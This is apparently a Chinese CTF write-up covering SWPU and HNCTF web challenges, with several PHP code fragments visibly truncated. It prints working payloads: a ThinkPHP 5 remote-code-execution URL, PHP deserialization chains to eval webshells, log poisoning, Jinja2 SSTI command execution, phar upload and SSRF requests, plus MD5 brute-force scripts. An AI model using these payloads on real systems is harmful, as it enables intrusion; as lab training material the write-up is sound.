目录
[WEEK2] easy_unser(is_file highlight_file对于php伪协议的使用)
<1> SWPU
(1) webdog1__start
在start.php 界面抓个包,发包
得到:F1l1l1l1l1lag.php
18){ die("This is too long."); } else{ eval($get); } }else { die("nonono"); }}
(2) ez_ez_php(revenge)
ThinkPHP V5 rce 漏洞
在网上可以找到现成的payload
Thinkphp5 RCE漏洞_Sentiment.的博客-CSDN博客_tp5 漏洞
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
替换whoami命令为我们要执行的命令即可
(3) 1z_unserialize
反序列化构造 assert(eval($_POST[1]));
cat /flag即可
(4) ez_1zpop
impo = new dxg; } function __wakeup() { $this->impo = new dxg; return $this->impo->fmm(); } function __toString() { if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52) return $this->impo->fmm(); } function __destruct() { echo $this; }}class fin{ public $a; public $url = 'https://www.ctfer.vip'; public $title; function fmm() { $b = $this->a; $b($this->title); }}if (isset($_GET['NSS'])) { $Data = unserialize($_GET['NSS']);} else { highlight_file(__file__);}
exploit.php
impo = new fin();$NSS -> md51 = 'QNKCDZO';$NSS -> md52 = 's878926199a';$NSS->impo -> a = 'assert';$NSS->impo -> title = 'eval($_POST[1])';echo serialize($NSS);
之后把属性改大一位,绕过__wakeup()函数
(5) numgame
查看js源码发现了NsScTf.php
preg_match匹配到 n或者c 就die("No"),但是它是/m 多行文本 不是/i ,所以可以大小写绕过
至于call_user_func()怎么利用
我们可以传参:?p=Nss::Ctf (静态函数调用)
回显:
改Nss为Nss2 最终payload:?p=Nss2::Ctf
查看源码,得到flag
(6) Crypto 爆破MD5
贴上爆破脚本
import stringimport hashlibalist = string.printablefor i in alist: for j in alist: for k in alist: for l in alist: data = 'Boom_MD5' + i + j + k + l s = hashlib.md5(data.encode('utf-8')).hexdigest() if s[:27] == "0618ac93d4631df725bceea74d0": print("Find it:", data, ":", s) exit()
<2> HNCTF
[Week1]Challenge__rce
if (isset($_POST['rce'])) { $rce = $_POST['rce']; if (strlen($rce) <= 120) { if (is_string($rce)) { if (!preg_match("/[!@#%^&*:'\->\"\/|`a-zA-Z~\\\\]/", $rce)) { eval($rce); } else { echo("Are you hack me?"); } } else { echo "I want string!"; } } else { echo "too long!"; }}
利用构造数组获取字母 然后自增构造chr函数
$___.=[];$_=$___[3];$_++;$_++;$__=$_++;$_++;$_++;$_++;$__.=++$_.$___[2];$_=_.$__(71).$__(69).$__(84);($$_{1})($$_{2});
[WEEK2]easy_include
日志注入, include /var/log/nginx/access_log
然后往 User-Agent里写入命令即可
[WEEK2]Canyource
highlight_file() show_source() 都被禁了 利用 echo(readfile())来读取
payload: ?code=echo(readfile(next(array_reverse(scandir(pos(localeconv()))))));
[WEEK2] ez_ssrf
fsockopen函数触发ssrf
使用fsockopen函数实现获取用户制定url的数据(文件或者html)。这个函数会使用socket跟服务器建立tcp连接,传输原始数据。fsockopen本身就是打开一个网络连接或者Unix套接字连接。 如下:
\n"; } else { $out = "GET / HTTP/1.1\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); while (!feof($fp)) { echo fgets($fp, 128); } fclose($fp); } ?>
因此构造poc.php:
得到data,host为127.0.0.1,port为80
传参:/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=
[WEEK2] easy_unser(is_file highlight_file对于php伪协议的使用)
want = $but; echo "C1ybaby!"; } function __destruct(){ $About_me = "I'm the final function,when the object is destroyed,I will be called"; echo "So,let me see if you can get what you want\n"; if($this->todonothing === $this->want) die("鲍勃,别傻愣着!\n"); if($this->want == "I can CHANGE you") die("You are not you...."); if($this->want == "f14g.php" OR is_file($this->want)){ die("You want my heart?No way!\n"); }else{ echo "You got it!"; highlight_file($this->want); } }}
构造序列化满足 !is_file($this->want) 且 可以 highlight_file($this-want);
考点:php伪协议绕过is_file highlight_file对于php伪协议的使用
is_file判断给定文件名是否为一个正常的文件,返回值为布尔类型。is_file会认为php伪协议不是文件。但highlight_file认为伪协议可以是文件。 所以我们可以用php伪协议来绕过显示flag文件
[WEEK2]ez_SSTI
?name={{7*'7'}} 检测出存在 SSTI 无过滤
?name={{config.__class__.__init__.__globals__['os'].popen('ls').read() }} 发现flag
?name={{config.__class__.__init__.__globals__['os'].popen('cat flag').read() }}
[WEEK3]ez_phar
upload.php 上传我们构造好的phar文件
startBuffering();$phar->setStub("");$phar->setMetaData($test);$phar->addFromString("test1.txt","test1");//签名自动计算$phar->stopBuffering();
那就 压缩成zip 改后缀为png绕过
执行 system('ls /'); 发现flag文件
再执行 system('cat //ffflllaaaggg'); 即可
[Week3]fun_php
这道题看着内容多,其实审计一下也就是一块一块的,静下心分区域看一看
$getUserID = @$_GET['user']; $getpass = (int)@$_GET['pass']; $getmySaid = @$_GET['mySaid']; $getmyHeart = @$_GET['myHeart']; if(is_string($getUserID)) $user = $user + $getUserID; //u5er_D0_n0t_b3g1n_with_4_numb3rif($user == 114514 && $getpass == $pass){ if (!ctype_alpha($getmySaid)) die(); if (!is_numeric($getmyHeart)) die(); if(md5($getmySaid) != md5($getmyHeart)){ die("Cheater!"); } else $week_1 = true;}
要求
$user == 114514 && $getpass == $pass 则传值 user=114514 pass不传他就默认==
$getmySaid为字母 $getmyHeart为数字,并且他俩md5() == 则传值mySaid=QNKCDZO&myHeart=240610708
$data = @$_POST['data'];if(is_array($data)){ for($i=0;$i
最初的循环作用是 遍历数组,如果遇到某一个键值为Probius 就exit()
但是只有 array_search("Probius",$data)===0 才能使 week_2为true
array_search作用:在数组中搜索键值 "red",并返回它的键名
所以我们传入data[0]=probius 绕过。
if($week_1 && $week_2){ if(md5($data)===md5($verify)) // HNCTFWelcome to if ("hn" == $_GET['hn'] &+!!& " Flag!ctf" == $_GET[LAGctf]) { //HN! flag!! F if(preg_match("/php|\fl4g|\\$|'|\"/i",$want)Or is_file($want)) die("HACK!"); else{ echo "Fine!you win"; system("cat ./$want"); } } else die("HACK!");}
由于data是数组,所以我们传入verify也是数组即可===绕过本地调试如下:
unicode隐藏字符,我们复制下来010editor打开
所以get传入hn=hn&%E2%80%AE%E2%81%A6%4C%41%47%E2%81%A9%E2%81%A6%63%74%66=%E2%80%AE%E2%81%A6%20%46%6C%61%67%21%E2%81%A9%E2%81%A6%63%74%66
want传值fl* 通配符绕过 最终Fine!you win 查看源码得到flag
查看源码得到flag
Crypto [WEEK2]md5太残暴了
小明养成了定期修改密码的好习惯,同时,他还是一个CTF爱好者。有一天,他突发奇想,用flag格式来设置密码,为了防止忘记密码,他还把密码进行了md5加密。为了避免被其他人看到全部密码,他还特意修改了其中部分字符为#。你能猜出他的密码吗?plaintext = flag{#00#_P4ssw0rd_N3v3r_F0rg3t_63####}md5 = ac7f4d52c3924925aa9c8a7a1f522451PS: 第一个#是大写字母,第二个#是小写字母,其他是数字。
贴上脚本
import stringimport hashlibs1 = string.ascii_uppercases2 = string.ascii_lowercases3 = []for i in range(0,10000): i = str(i) if len(i)!=4: s3.append('0'*(4-len(str(i)))+i) else: s3.append(i)for i in s1: for j in s2: for k in s3: s = 'flag{'+i+'00'+j+'_P4ssw0rd_N3v3r_F0rg3t_63'+k+'}' print(s) if hashlib.md5(s.encode('utf-8')).hexdigest() == 'ac7f4d52c3924925aa9c8a7a1f522451': print("Find it: "+s) exit(0)
来源地址:https://blog.csdn.net/weixin_63231007/article/details/127135455